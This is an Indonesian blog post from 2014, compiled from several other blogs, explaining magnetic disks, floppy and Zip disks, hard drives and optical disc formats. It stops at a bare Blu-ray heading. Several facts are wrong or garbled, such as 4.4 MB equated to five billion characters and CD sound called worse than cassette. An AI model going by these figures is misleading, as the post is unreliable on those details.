Senin, 20 Oktober 2014

TEMPAT PENYIMPANAN DATA


TEMPAT PENYIMPANAN DATA



PERBEDAAN JENIS PENYIMPANAN :

1.MAGNETIK DISK


A. Pengertian Magnetic Disk

Disk merupakan sebuah piringan bundar yang terbuat dari logam atau plastik yang dilapisi dengan bahan yang dapat dimagnetisasi. Data direkam di atasnya dan kemudian dapat dibaca dari disk dengan menggunakan kumparan pengkonduksi (conducting coil), yang dinamakan head. Selama operasi pembacaan dan penulisan, head bersifat stationer sedangkan piringan bergerak-gerak di bawahnya.

Mekanisme penulisan berdasarkan berdasarkan pada medan magnet yang dihasilkan arus listrik yang mengalir melalui sebuah kumparan. Pulsa kemudian dikirimkan ke head, dan pola-pola megnetik direkam pada permukaan di bawahnya, dengan pola yang berbeda bagi arus listrik yang berada di dalam kumparan yang dihasilkan oleh medan listrik yang bergerak relative terhadap kumparan. Pada saat permukaan disk melintasi bagian bawah head, maka ermukaan disk mengeluarkan arus yang mempunyai polaritas yang sama dengan polaritas yang telah direkam.

B. Karakteristik Fisik pada Magnetic Disk

Disk Pack adalah jenis alat penyimpanan pada magnetic disk, yang terdiri dari beberapa tumpukan piringan aluminium. Dalam sebuah pack / tumpukan umumnya terdiri dari 11 piringan. Setiap piringan diameternya 14 inch (8 inch pada mini disk) dan menyerupai piringan hitam. Permukaannya dilapisi dengan metal-oxide film yang mengandung magnetisasi seperti pada magnetic tape.

Banyak track pada piringan menunjukkan karakteristik penyimpanan pada lapisan permukaan, kapasitas disk drive dan mekanisme akses. Disk mempunyai 200 – 800 track per-permukaan (banyaknya track pada piringan adalah tetap). Pada disk pack yang terdiri dari 11 piringan mempunyai 20 permukaan untuk menyimpan data.

Kedua sisi dari setiap piringan digunakan untuk menyimpan data, kecuali pada permukaan yang paling atas dan paling bawah tidak digunakan untuk menyimpan data, karena pada bagian tersebut lebih mudah terkena kotoran / debu dari pada permukaan yang di dalam. Juga arm pada permukaan luar hanya dapat mengakses separuh data.

Untuk mengakses, disk pack disusun pada disk drive yang didalamnya mempunyai sebuah controller, access arm, read / write head dan mekanisme untuk rotasi pack. Ada disk drive yang dibuat built-in dengan disk pack, sehingga disk pack ini tidak dapat dipindahkan yang disebut non-removable. Sedangkan disk pack yang dapat dipindahkan disebut removable.

Disk controller menangani perubahan kode dari pengalamatan record, termasuk pemilihan drive yang tepat dan perubahan kode dari posisi data yang dibutuhkan disk pack pada drive. Controller juga mengatur buffer storage untuk menangani masalah deteksi kesalahan, koreksi kesalahan dan mengontrol aktivitas read / write head.

Susunan piringan pada disk pack berputar terus-menerus dengan kecepatan perputarannya 3600 per-menit. Tidak seperti pada tape, perputaran disk tidak berhenti di antara piringan-piringan pada device.

Kerugiannya bila terjadi situasi dimana read / write head berbenturan dengan permukaan penyimpanan record pada disk, hal ini disebut sebagai head crash.

C. Cara Kerja Magnetic Disk

1. Representasi Data dan Pengalamatan

Data pada disk juga di block seperti data pada magnetic tape. Pemanggilan sebuah block adalah banyaknya data yang diakses pada sebuah storage device. Data dari disk dipindahkan ke sebuah buffer pada main storage computer untuk diakses oleh sebuah program. Kemampuan mengakses secara direct pada disk menunjukkan bahwa record tidak selalu diakses secara sequential. Ada 2 teknik dasar untuk pengalamatan data yang disimpan pada disk, yaitu :

1. Metode Silinder;

Pengalamatan berdasarkan nomor silinder, nomor permukaan dan nomor record. Semua track dari disk pack membentuk suatu silinder. jadi bila suatu disk pack dengan 200 track per-permukaan, maka mempunyai 200 silinder.

Bagian nomor permukaan dari pengalamatan record menunjukkan permukaan silinder record yang disimpan. Jika ada 11 piringan, maka nomor permukaannya dari 0 – 19 (1 – 20). Pengalamatan dari nomor record menunjukkan dimana record terletak pada track yang ditunjukkan dengan nomor silinder dan nomor permukaan.

2. Metode Sektor

Setiap track dari pack dibagi ke dalam sektor-sektor. Setiap sektor adalah storage area untuk banyaknya karakter yang tetap. Pengalamatan recordnya berdasarkan nomor sektor, nomor track dan nomor permukaan. Nomor sektor yang diberikan oleh disk controller menunjukkan track mana yang akan diakses dan pengalamatan record terletak pada track yang mana.

Setiap track pada setiap piringan mempunyai kapasitas penyimpanan yang sama, meskipun diameter tracknya berlainan. Keseragaman kapasitas dicapai dengan penyesuaian density yang tepat dari representasi data untuk setiap ukuran track. Keuntungan lain pendekatan keseragaman kapasitas adalah file dapat ditempatkan pada disk tanpa merubah lokasi nomor sektor (track atau cylinder) pada file.

2. Movable-Head Disk Access

Movable-head disk drive mempunyai sebuah read/write head untuk setiap permukaan penyimpanan recordnya. Sistem mekanik yang digunakan oleh kumpulan posisi dari access-arm sedemikian sehingga read / write head dari pengalamatan permukaan menunjuk ke track. Semua access-arm pada device dipindahkan secara serentak tetapi hanya head yang aktif yang akan menunjuk ke permukaan.

3. Cara Pengaksesan Record yang Disimpan pada Disk Pack

Disk controller merubah kode yang ditunjuk oleh pengalamatan record dan menunjuk track yang mana pada device tempat record tersebut. Access arm dipindahkan, sehingga posisi read / write head terletak pada silinder yang tepat.

Read / write head ini menunjuk ke track yang aktif. Maka disk akan berputar hingga menunjuk record pada lokasi read / write head. Kemudian data akan dibaca dan ditransfer melalui channel yang diminta oleh program dalam komputer.

ACCESS TIME = SEEK TIME (pemindahan arm ke cylinder)

+ HEAD ACTIVATION TIME (pemilihan track)

+ ROTATIONAL DELAY (pemilihan record)

+ TRANSFER TIME

§ Seek Time

Adalah waktu yang dibutuhkan untuk menggerakkan read / write head pada disk ke posisi silinder yang tepat.

§ Head Activational Time

Adalah waktu yang dibutuhkan untuk menggerakkan read / write head pada disk ke posisi track yang tepat.

§ Rotational Delay (Lateney)

Adalah waktu yang dibutuhkan untuk perputaran piringan sampai posisi record yang tepat.

§ Transfer Time

Adalah waktu yang menunjukkan kecepatan perputaran dan banyaknya data yang ditransfer.

4. Fixed - Head Disk Access

Disk yang mempunyai sebuah read / write head untuk setiap track pada setiap permukaan penyimpanan, yang mekanisme pengaksesannya tidak dapat dipindahkan dari cylinder ke cylinder.

AC ACCESS TIME = HEAD-ACTIVATION TIME + ROTATIONAL DELAY + TRANSFER TIME

Banyaknya read / write head menyebabkan harga dari fixed-head disk drive lebih mahal dari movable-head disk drive. Disk yang menggunakan fixed-head disk drive mempunyai kapasitas dansdensity yang lebih kecil dibandingkan dengan disk yang menggunakan movable-head disk drive.

5. Organisasi Berkas dan Metoda Akses pada Magnetic Disk

Untuk membentuk suatu berkas di dalam magnetic disk bisa dilakukan secara sequential, index-sequential ataupun direct. Sedangkan untuk mengambil suatu data dari berkas yang disimpan dalam disk, bisa dilakukan secara langsung dengan menggunakan direct access method atau dengan sequential access method (secara sequential).

D. Perkembangan Magnetic Disk dari Masa ke Masa ( dimulai tahun 80-an)
Floppy Disk

Disket merupakan media penyimpanan yang sangat populer bagi personal komputer. Secara pisik, disket terbuat dari lempengan plastik yang berbentuk bundar dimana pada permukaannya dilapisi oleh magnit sebagai tempat untuk menyimpan guratan-guratan data. Untuk menjaga agar data ataupun program yang tersimpan didalam disket tetap terjaga kebersihannya, disket kemudian dibungkus oleh karton yang berbentuk segi empat. Untuk melakukan pembacaan ataupun penulisan, disket harus dimasukkan kedalam sebuah drive, drive ini kemudian disebut sebagai disket-drive. Pada setiap drive yang ada, telah berisi sebuah shaft dan sebuah drive motor yang berfungsi untuk memutar disket dengan kecepatan sekitar 360 hingga 500 rpm. Sebuah sinyal elektronik yang datang dari sistem kontrol, akan menyebabkan read/write head yang berfungsi untuk melakukan pembacaan/penulisan untuk terus bergerak diatas permukaan disket yang sedang berputar guna melakukan pembacaan/ penulisan.

Bagian-bagian dari disket adalah :

ü Stress relief cutouts, berfungsi untuk membuka/tutup pengait drive.

ü Read/Write Windows, merupakan jendela yang digunakan untuk membaca dan menulis dari mekanisme drive.

ü Hub ring, berfungsi sebagai pegangan untuk memutar disket.

ü Index Hole, apabila lubang yag ada pada karton/cover menumpuk dengan lubang pada disket, menandakan posisi sector 0.

ü Write, lubang ini apabila dalam posisi terbuka, maka disket bisa dibaca dan ditulis; Apabila tertutup maka disket hanya bisa dibaca saja.

ü Label, digunakan untuk menulis nama pemilik disket ataupun nama program/data yang tersimpan didalamnya.

Disket

Disket ini diperkenalkan pertama kali pada tahun 1969. Saat itu media ini hanya bisa membaca saja atau istilahnya adalah read only. Maksudnya adalah, ketika data tersimpan, data tidak lagi bisa dimodifikasi ataupun di hapuskan dari dalam floppy disk ini. Ukuran media ini hanya sektar 8 inch dan hanya dapat menyimpan data sekitar 80kb. Empat tahun kemudian, floppy disk yang sama muncul dan dapat menyimpan data sebanyak 256kb. Perkembangan selanjutnya terjadi pada tahun 1990, lahir sebuah disk dengan ukuran 3 inch yang dapat menyimpan data sekitar 250mb atau biasa disebut zip disk.

 Disket dimasukkan ke floppy disk drive, yaitu alat untuk menahan, memutar, membaca, dan menulis data ke disket. “Baca” berarti data di media penyimpan sekunder diubah ke dalam bentuk sinyal elektronik dan salinan data tersebut dikirimkan ke memory komputer (RAM). Sedangkan “tulis” berarti salinan informasi elektronik hasil pemrosesan komputer ditransfer ke penyimpan sekunder.

Pengunci baca :

Disket memiliki pengunci baca agar disket tidak bisa ditulisi. Dengan kata lain, data di dalam disket bisa terlindung. Caranya : gunakan jari jempol atau ujung pena untuk memindahkan pengunci baca ke arah bawah (tampak belakang), sehingga lubang kotaknya terbuka.

Track, sektor, dan cluster

Pada disket, data disimpan dalam arah memusat yang dinamakan track. Berbeda dari gramofon, track-track di disket tidak mempunyai alur atau lingkaran tunggal. Track di disket membentuk lingkaran-lingkaran terpusat. Ketika sebuah disk diformat, lokasi penyimpan terbagi menjadi sektor-sektor arah tertentu sehingga track-track di disket terbagi dalam beberapa busur yang dinamakan sektor. Saat data dari komputer disimpan ke disket, data kemudian disebarkan ke track-track dan sektor. Oleh sebab itu, perangkat lunak sistem menggunakan titik irisan sektor dan track sebagai penunjuk lokasi data. Unit terkecil ruang disk sebagai tempat penyimpan data dinamakan cluster. Cluster adalah sekumpulan sektor pada alat penyimpan. Istilah track, sektor, dan cluster juga dipakai di hardisk (akan dibahas kemudian).

Head baca/tulis

Ketika disket dimasukkan ke slot (drive gate atau drive door) pada bagian depan floppy drive, disket ditempatkan di atas kumparan mekanisme drive. Head baca/tulis digunakan untuk mentransfer data antara komputer dan disket. Saat disket berputar di dalam plastik pembungkus, head baca/tulis bergerak maju mundur melalui area akses data di disket. Dan saat disket tidak berada di drive, penutupnya yang terbuat dari logam atau plastik berfungsi untuk menutupi area akses data tersebut. Lampu akses akan menyala ketika disket sedang bekerja. Selesai memakai disket, Anda bisa mengambilnya dengan cara menekan tombol keluar di samping drive

8.Zip Disk

Zip Disk contoh alternatif penyimpan adalah floppy disk cartridge—disket yang berkapasitas lebih besar, misalnya Zip disk. Diproduksi oleh Iomega Corp., Zip disk adalah disk berlapis magnetik berkualitas tinggi yang memiliki kapasitas sebesar 100, 250 bahkan 750 megabyte. Untuk ukuran 100 megabyte saja, kapasitasnya telah melampaui 70 kali kapasitas disket biasa. Zip disk memerlukan zip disk drive tersendiri, meskipun telah tersedia pula drive zip external (biasanya versi USB). Zip disk dimanfaatkan untuk menyimpan file spreadsheet, file database, file gambar, file presentasi multimedia, dan file-file situs web yang berukuran besar.

9. Hard Drive

Pada tanggal 13 september 1956, komputer IBM 305 RAMA dalam kondisi tidak terselubingi. Komputer tidak mengalami perubahan sejak dapat menyimpan data sekitar 4.4mb (kira - kira, besar jumlah penyimpanan ini setara dengan 5 milyar karakter). Pada saat itu, hal ini sudah menjadi hal yang sangat menakjubkan. Data tersimpan dalam 50 buah magnetic disk yang berukuran 24 inch, dan inilah hard drive pertama di dunia. Lebih dari 1000 sistim dibangun dan diproduksi pada akhir tahun 1961.

Contoh Hard Drive Pertama

10. Hard Disk

Hard drive pertama yang berkapasitas 500gb adalah hitachi dekstar 7k yang jika dibandingkan dengan hard drive pertama adalah 1 hard drive hitachi ini setara dengan 120.000 hard drive pertama di dunia dari IBM 305 RAMA. Hal ini cenderung tiap tahun kitadapat memperoleh drive yang dapat menyimpan data secara cepat dengan harga yang relatif lebih murah.

Contoh Hard Disk Drive

Hard Disk adalah non-volatile storage device yang menyimpan data secara electronik dengan kapasitas besar (High-capacity storage) yang dikodekan secara digital pada piring-piring yang berputar cepat dengan permukaan magnetic dan berisi beberapa plat yang keras,dan bundar serta komponen yang menyertai berada dalam wadah yang kedap udara, dan tersegel untuk keamanan.

Hard disk akan merekam data dalam putaran konsentris yang biasa disebut dengan track. Dalam sebuah track ini masih ada pembagian lagi yang disebut dengan sektor. Masing-masing track dalam sebuah disk bisa diibaratkan sebuah buku tempat anda menyimpan tulisan yang tertata rapi dalam sebuah disk. Kalau sistem operasi membutuhkan file yang terletak dalam track dan sektor tertentu maka permintaan tersebut akan diteruskan lewat lengan pengendali head ke posisi track dan sektor tertentu dimana data disimpan.
Saat sistem operasi mengirim data ke hard disk untuk disimpan maka drive pada hard disk akan terlebih dahulu melakukan perhitungan data dengan rumus matematis yang kompleks untuk menambahkan hitungan bit pada sebuah data. Dengan konversi ini maka data bisa disimpan dengan lebih efisien. Selain itu ketika nanti data tersebut dibutuhkan kembali tambahan bit tersebut mampu mendeteksi dan mengkoreksi kesalahan acak karena variasi dari ruangan magnetis yang lebar.
Selanjutnya head akan digerakkan menuju track tertentu di atas disk untuk melakukan baca dan tulis. Waktu yang dibutuhkan untuk memindahkan head dari satu track ke track yang lain inilah yang disebut dengan seek time. Setelah berada pada track yang benar head akan menunggu sampai berada pada sektor tertentu untuk membaca dan menulis data. Untuk menulis data head akan menunggu sampai berada pada sektor yang belum terisi sementara saat membaca head akan menunggu sampai berada pada sektor dimana data disimpan.
Waktu yang dibutuhkan untuk menunggu berada pada sektor yg tepat ini sering disebut sebagai latency. Semakin kecil nilai seek time dan latency maka akan semakin tinggi kinerja sebuah hard disk. Saat head berada pada sektor yang tepat untuk menuliskan data maka sebuah pulsa elektronik akan disalurkan lewat head menuju piringan. Pulsa elektronik tersebut menghasilkan tempat tertentu diatas disk untuk menyimpan data.

• Hard Drive/Hard Disk

Hard disk merupakan salah media penyimpan data yang cukup populer bagi mainframe ataupun PC. Harddisk merupakan media penyimpanan yang memiliki bentuk pisik yang berbeda jika dibanding dengan disket. Secara umum hard disk biasanya terpasang dan menyatu didalam CPU (fixed disk). Mekanisme yang menyebabkan data yang tersimpan bisa dibaca ataupun ditulis didalam hard disk, disebut sebagai disk drive. Didalam hard disk terdapat lempengan-lempengan logam bundar yang disusun berlapis-lapis serta terdapat motor penggerak lempengan logam dan read/write head-nya. Keunggulan dari hard disk adalah mampu menampung data dalam jumlah yang sangat besar serta memiliki kecepatan pada saat memanggil kembali data yang tersimpan. Harddisk dengan ukuran 3 Giga Byte pada saat ini sudah dianggap terlalu kecil, dan kini mulai beredar harddisk dengan ukuran yang jauh lebih besar.

E. Kelebihan dan Kekurangan Penggunaan Magnetic Disk

Media magnetik seperti disket floppy dan hard disk mempunya sejumlah keunggulan dibanding dengan media lainnya. Penyimpanan data pada media ini bersifat nonvolatile, artinya data yang telah disimpan tidak akan hilang ketika komputer dimatikan. Data pada media ini dapat dibaca, dihapus dan ditulis ulang. Keunggulan lainnya ialah, media ini mudah digunakan. Selain memiliki keunggulan, media ini juga mempunyai kelemahan.

Musuh utama dari media magnetik seperti disket floppy dan hard disk ialah jamur dan karat. Karena jamur dan karat ini, maka daya tahan atau umur media ini menjadi pendek. Jika dipakai secara kontinu atau terus menerus sekitar 8 jam per hari, maka umur suatu disket floppy paling lama 1 (satu) tahun, dan umur hard disk paling lama 3 (tiga) tahun. Kelemahan lain dari media magnetik ini ialah bentuknya yang bergaris-garis (track, sector), sehingga kecepatan dan kapasitas simpannya termasuk rendah jika dibanding dengan media optik.

http://anysluthfia.blogspot.com/2013/04/a.html


Sejarah Optical Disc Driver

Pengertian Optical Disc Driver

Dalam dunia komputer, Optical Disc Drive adalah sebuah perangkat keras yang menggunakan sinar laser atau gelombang elektromagnetik untuk melakukan proses pembacaan (reading) dari optical disc dan penulisan (writing) data. Beberapa drives hanya bisa membaca data pada disc, namun teknologi saat ini memperbolehkan sebuah drive untuk melakukan pembacaan maupun penulisan pada drives.

Compact Disc, DVD dan Blu-ray Disc merupakan jenis-jenis dari optical media yang bisa dibaca maupun diisi data oleh optical drive. Optical Drive merupakan sebutan umum, dengan bagian-bagiannya yaitu “CD”, “DVD” dan “Blue-ray” dengan diikuti “drive”, “writer”, dan lain-lain.
Sejarah Optical Disc Driver

James T. Rusell adalah orang yang pertama kali menemukan CD. Sejak kecil, James dikenal dengan jiwa penemunya. Pada tahun 1937, saat berusia 6 tahun, James membuat remote control untuk kapal perang mainannya dengan menggunakan kotak makan siangnya.James juga termasuk orang pertama yang menikmati televisi dan keyboard sebagai media masukan dan ke komputer. James seorang penggila musik dimasa itu. Dia sangat tidak puas dengan kualitas musik yang dihasilkan keping piriongan hitam Gramafon (phonograph).Karena penasaran, sampai-sampai James bereskperimen mengghunakan duri kaktus sebagai jarus pembaca piringan hitam.James sudah menduga kalau hasil eksperimennya sia-sia. James menginginkan sistem yang akan merekam dan memutar kembali lagi sebuah lagu tanpa harus kontak langsung antarbagiannya. James melihat bahwa cara terbaik untuk itu adalah dengan menggunakan cahaya.

Prinsip Kerja
Ketika sinar laser menyinari lapisan reflective layer akan memantulkan ke sensor optik dikarenakan adanya pit atau lubang-lubang pada Disk tersebut maka pantulannya menjadi tidak sempurna (berkedip). kedipan inilah yang menjadi informasi ke sensor optic. Informasi dari Disk yang berupa kedipan tersebut diterjemahkan olah sensor sebagai true dan false, atau dalam bilangan biner (bit) yaitu 0 dan 1 untuk selanjutnya diterjemahkan oleh CPU sebagai data Untuk lebih mudahnya seperti sandi morse yang ditulis titik dan garis atau pendek dan panjang mengunakan suara/cahaya seterusnya diterjemahkan sebagai kata.

http://2009073-almujahidin.blogspot.com/2012/06/media-penyimpanan-optical-disk.html

Teknologi optical disk ini dibagi menjadi dua yaitu:

1. Phase-change disk dimana, disk ini dilapisi oleh bahan yang dapat mengkristal(beku) menjadi crystalline(serpihan-serpihan kristal) atau menjadi amorphous state(bagian yang tak berbentuk). Bagian crytalline ini lebih transparan, karenanya tembakan laser yang mengenainya akan lebih terang melintasi bahan dan memantul dari lapisan pemantul. Drive Phase-change disk ini menggunakan sinar laser dengan kekuatan yang berbeda. Sinar laser dengan kekuatan tinggi digunakan melelehkan disknya kedalam amorphous state, sehingga dapat digunakan untuk menulis data lagi.sinar laser dengan kekuatan sedang dipakai untuk menghapus data denga cara melelehkan permukaan disknya dan membekukannya kembali ke dalam keadaan crytalline, sedangakan sinar laser dengan kekuatan lemah digunakan untuk membaca data yang telah disimpan.

2. Dye-Polimer disk yaitu , Dye-polimer merekam data dengan membuat bump(gelombang) disk dilapisi dengan bahan yang dapat enyerap sinar laser. sinar laser ini membakar spot hingga spot ini memuai dan membentuk bump(gelombang). bump ini dapat dihilangakan atau didatarkan kembali dengan cara dipanasi lagi dengan sinar laser.


Implementasi Laser/Optic pada Media Disc
2.4.1. ROM (Read Only Memory).

Ketika dalam proses pembuatan atau pencetakan data Disc ROM di pabrik, data dibentuk menggunakan cara di-pres. Sehingga terbentuk lubang-lubang disetiap jalur permukaan Disc. Hal ini akan membentuk serial data layaknya 1 atau 0 (digital), karena perbedaan refleksi Wavelenght sinar Laser untuk permukaan tanpa lubang dengan permukaan berlubang. Lubang ini biasanya memiliki kedalaman antara seperempat hingga seperenam Wavelenght Laser yang digunakan.
2.4.2. Recordable (+/-R)

Unit Optical Drive juga dapat secara langsung me-record data kedalam media Disc. Salah satunya yang paling awal adalah tipe Optical Drive Recordable. Drive hanya dapat menuliskan sekali saja ke dalam media Optical Disc kosong. Tipe-tipe medianya sendiri dalam bentuk CR-R, DVD-R, DVD+R, atau BD-R Disc. Proses Encoding data (biasa disebut burn), dengan cara memanaskan bagian lapisan organik dari permukaan media menggunakan sinar Laser. Hal ini akan membuat perubahan terhadap tingkat Reflektivitas dari lapisan organik tersebut. Bagian yang ipanaskan tersebut dapat dianalogikan seperti lubang-lubang yang menggunkan proses press dimedia ROM. Untuk Recordable Disc, proses ini adalah permanen dan media kosong hanya dapat ditulis sekali saja. Terdapat perbedaan antara sinar Laser untuk red dan record. Untuk red, biasanya hanya membutuhkan Laser berkekuatan 5 mW sedangkan untuk record membutuhkan Laser yang jauh lebih kuat lagi. Hal ini dikarenakan proses pemanasan oleh sinar Laser. Selain itu, semakin cepat proses penulisan, semakin seikit pula oleh Laser. Untuk mendapatkan hasil yang maksimal, Laser menggunakan daya 100 mW untuk gelombang kontinu dan 225 mW. Gelombang pluse.
2.4.3. Rewriteable (+/-RW)

Pada unit tipe Rewriteable, seperti CD-RW , DVD-RW, DVD+RW, DVD-RAM, atau BD-RE bahan yang digunakan pada permukaan pada permukaan adalah Crystallinmetal Alloy. Dengan menggunakan bahan ini, proses pembakaran (burn) dapat dikondisikan lagi seperti semula melalui pemakaian data Laser yang bervariasi.
Terdapat dua mobel Optical Drive untuk jenis kapasitas dua kali lipat. Pertama, model Double-Sided yang menempatkan permukaan data pada setiap sisi Disc. Hal ini cukup memudahkan proses burn, hanya saja sedikit menyusahkan penggunaan karena untuk mengakses sisi lain harus dengan membalikan media Disc secara fisik (bongkar-pasang).
Berikutnya adalah model Dobel Layer, yakni media Disc yang memiliki dua Layer berbeda dari satu Disc, yang dipisahkan oleh Layer Semi-Reflektif kedua Layer ini dapat diakses pada sisi Disc yang sama. Namun memerlukan Optif untuk mengubah fokus Laser agar dapat mengakses layar ke dua.

Perkembangan Optical Disk dari Masa ke Masa ( dimulai tahun 80-an)
1. CD-ROM (Read Only Memory) Drives

CD-ROM merupakan akronim dari “Compact Disc Read-only Memory” adalah sebuah piringan kompak dari jenis piringan optik (optical disc) yang dapat menyimpan data. Ukuran data yang dapat disimpan saat ini bisa mencapai 700MB atau 700 juta bitaCD-ROM drive hanya bisa digunakan untuk membaca sebuah CD saja. Secara gari besar CD-ROM dibedakan menjadi 2 menurut tipenya yaitu : ATA/IDE dan SCSI. Yang paling mendasari dari perbedaan tersebut adalah kecepatannya. Kalau ATA memiliki kecepatan 100-133Mbps sedangkan SCSI memiliki kecepatan kira-kira 150 Mbps. Untuk tipe SCSI biasanya ditemuka pada CR RW drive. Pada CD ROM terdapat tulisan 56X artinya kemampuan memberikan kecepatan transfer data sebesar 56 x150 Kbps. Tipe CD RW juga biasanya dibedakan berdasarkan kemapuan membakar dan membaca. CD RW tipe 12x8x32 artinya memiliki kemampuan membakar pada CD R seccepat 12x, membakar pada CD RW secepat 8x, dan membaca CD R/CD RW/dengan kecepatan maksimal 32x. Pada CDROM informasi yang tersimpan juga berupa 0 dan 1. Tentunya angka 0 dan 1 ini bukan langsung tertulis berupa angka 0 dan 1 melainkan merupakan keadaan pada lapisan tertentu pada CD-ROM tersebut. CD-ROM yang dibahas disini adalah CD ROM yang dicetak bukan CD-R ataupun CD-RW. Pada dasarnya semua CD memberikan informasi menggunakan teknik apakah suatu sinar yang diarahkan pada suatu posisi akan dipantulkan ke titik tertentu atau tidak. Perbedaannya terletak pada cara CD tersebut melakukannya. Pada CD-ROM yang memang dicetak, dipantulkan tidaknya suatu sinar itu ditentukan oleh cetakan yang digunakan. Jadi cetakan yang digunakan harus disesuaikan dengan informasi yang ingin disimpan. Setelah dicetak tidak bisa lagi diubah data digital yang tersimpan pada CD-ROM tersusun mulai dari bagian terdalam pada CD-ROM menuju ke bagian terluar dari CD-ROM.
2. CD-RW (Read/Write) Drives

Dalam proses merekam CD tidak seperti mengcopy namun dinamakan membakar CD (burning CD). Untuk bisa merekam ke dalam CD dibutuhkan software pembakar CD (burning tool) seperti Nero, Clone CD, dll. Dalam membakar CD harus diperhatikan kecepatan burning, semakin cepat proses burning semakin sulit dibaca oleh CD-ROM yang mempunyai kecepatan baca dibawah kecepatan saat perekaman. Untuk keperluan back-up dan penyimpanan data disarankan membakar CD antara 8x -24x.
3. DVD (Digital Video Disc atau Digital Versatile Disc)

DVD adalah media penyimpanan data seperti CD namun memiliki kapasitas yang lebih besar. DVD single layer mampu menyimpan data sampai 4.7GB dan DVD double layer mampu menyimpan data sampai 8.4 GB. Sama seperti CD, DVD juga ada dua yaitu DVD-ROM dan DVD-RW. Kadang DVD-RW disebut juga DVD-RAM Drive.
Jenis-jenis Optical Disc

Cakram Digital (dalam bahasa Inggris: Compact Disc, disingkat CD), cakram padat, atau cakram optik adalah sebuah piringan optikal yang digunakan untuk menyimpan data secara digital. Sejak diperkenalkan secara resmi pada tahun 1982, CD memperoleh puncak penjualan pada tahun 2000 yaitu mencapai 2.445 juta keping Keuntungan yang diperoleh dari CD adalah kualitas suara yang dihasilkan tidak mungkin sebagus yang ada di kaset, selain itu CD sangat ringan dan mudah dibawa serta merupakan barang yang sangat tahan lama. CD menawarkan kapasitas penyimpanan data yang besar serta kapabilitas produksi.
CD memiliki format standar, panduan format standar ada pada “buku merah” yang diterbitkan oleh Sony dan Philips. Formatnya adalah dua-channel 16-bit PCM encoding dengan sampling rate sebesar 44,1kHz per Channel. Pemilihan tingkat sampling rate didasarkan kepada kebuuhan untuk reporduksi rentang frekuensi antara 20 Hz- 20 Khz Dalil sampling Nyquist-Shannon menyatakan bahwa tingkat sampling lebih ari dua kali frekuensi maksimun dari sinyal yang akan direkam. Sehingga perekam di CD membutuhkan minimal 40kHz. Pemilihan tingkat sampling 44,1kHz berdasarkan metode konversi suara digital ke penyimpanan sinyal analog video untuk disimpan di U-matic video tape.
Buku Merah audio hanya memuat sedikit mengenai anti penyalinan CD, di dalamnya juga tidak dimasukan mengenai mekanisme anti penyalinan. Pada awal 2002, dilakukan upaya perusahaan rekaman untuk melindungi CD dari penyalinan data. CD ini tidak dapat dengan mudah disalin atau digandakan, di rusak ataupun dikonversi kedalam MP3. Salah satu kelemahan utama adalah CD anti-penyalinan biasanya tidak dapat digunakan atau dibaca oleh peralatan CD-ROM komputer ataupun pemutar CD biasa yang menggunakan mekanisme CD-ROM. Philips menyatakan bahwa CD anti-penyalinan tidak berhak menggunakan label compact disc digital audio karena melanggar spesifikasi yang ada di buku merah. Banyak sistem anti-penyalinan ini dilawan oleh konsumen CD dengan menggunakan perangkat lunak di internet yang tersedia secara gratis.
CD-ROM

CD-ROM merupakan akronim dari Compact Disc Read-only Memory, adalah sebuah cakram padat dari jeniscakram optik (optical disc) yang dapat menyimpan data. Ukuran data yang dapat disimpan saat ini bisa mencapai 700MB atau 700 juta bita. CD-ROM bersifat “read-only” (hanya dapat dibaca, dan tidak dapat ditulisi). Untuk dapat membaca isi CD-ROM, alat utama yang diperlukan adalah drive CD.
CD-R

CD-R adalah singkatan dari istilah bahasa Inggris Compact Disc-Recordable merupakan jenis cakram padat yang dapat diisi dengan data. Salah satu jenis media penyimpanan eksternal padakomputer. Secara fisik CD-R merupakan CD polikarbonat kosong berdiameter 120 mm sama sepertiCD ROM. Awalnya CD-R dilapisi emas sebagai media refleksinya.Permukaan reflektif pada lapisan emas tidak memiliki depresi atau lekukan – lekukan fisik seperti halnya pada lapisan aluminium kemudian disempurnakan dengan cara dengan menambahkan lapisan pewarna di antara polikarbonat dan lapisan emas. Jenis pewarna yang seringdigunakan adalah cyanine yang berwarna hijau dan pthalocynine yang berwarna oranye kekuning kuningan.
CD-RW

CD-RW (bahasa Inggris: Compact Disc-ReWritable) CD-RW adalahCD-ROM yang dapat ditulisi kembali. CD-RW menggunakan media berukuran sama dengan CD-R. tetapi bukan menggunakan bahan pewarna cyanine ataupthalocyanine, CD-RW menggunakan logam perpaduan antara perak, indium,antimon, dan telurrium untuk lapisan perekaman.
Kandar CD-RW menggunakan laser dengan tiga daya yang berbeda. Pada daya yang tinggi, laser melelehkan logam paduan, yang mengubahnya dari kondisi kristalin reflektivitas tinggi menjadi kondisi amorf refletivitas agar menyerupai sebuah pit. Pada daya sedang, logam paduan meleleh dan berubah kembali dalam kondisi kristalin alamiahnya untuk menjadi land lagi. Pada daya rendah, keadaan/kondisi material ditelaah (untuk pembacaan), tetapi tidak ada transisifase yang terjadi. Cakram CD-RW relatif lebih mahal dibandingkan cakram CD-R.
DVD

DVD adalah sejenis cakram optik yang dapat digunakan untuk menyimpandata, termasuk film dengan kualitasvideo dan audio yang lebih baik dari kualitas VCD. “DVD” pada awalnya adalah singkatan dari digital video disc, namun beberapa pihak ingin agar kepanjangannya diganti menjadi digital versatile disc (cakram serba guna digital) agar jelas bahwa format ini bukan hanya untuk video saja. Karena konsensus antara kedua pihak ini tidak dapat dicapai, sekarang nama resminya adalah “DVD” saja, dan huruf-huruf tersebut secara “resmi” bukan singkatan dari apapun. Terdapat pula perangkat lunak yang membolehkan pengguna untuk mencadangkan (back-up) DVD sendiri seperti DVD Decrypter danDVD Shrink.
HD DVD

HD DVD (singkatan dari High-Definition DVD) adalah sebuah formatcakram optik berkepadatan tinggi yang didisain untuk menyimpan data termasuk video definisi tinggi.
Cakram HD DVD dirancang untuk menggantikan format DVD. HD DVD dapat menampung data sebanyak tiga kali data yang ditampung DVD (15 GB per lapis berbanding 4,7 GB). Standar HD DVD dikembangkan oleh Toshibadan NEC. Pada 19 November 2003,DVD Forum turut mendukung HD DVD sebagai penerus standardefinisi tinggi. Pada pertemuan tersebut disepakati untuk menggunakan nama HD DVD yang sebelumnya dinamai AOD (Advanced Optical Disc).
Di Consumer Electronics Show2006, Microsoft mengumumkan bahwa akan ada perangkat eksternal tambahan berupa kandar HD DVD di konsol permainan Xbox 360, hal ini direalisasi padaNovember 2006. Pada ajang tersebut, perusahaaan-perusahaan yang mendukung format HD DVD juga mengatakan bahwa akan ada 200 judul film akan tersedia pada akhir tahun.
Blu-ray Disc

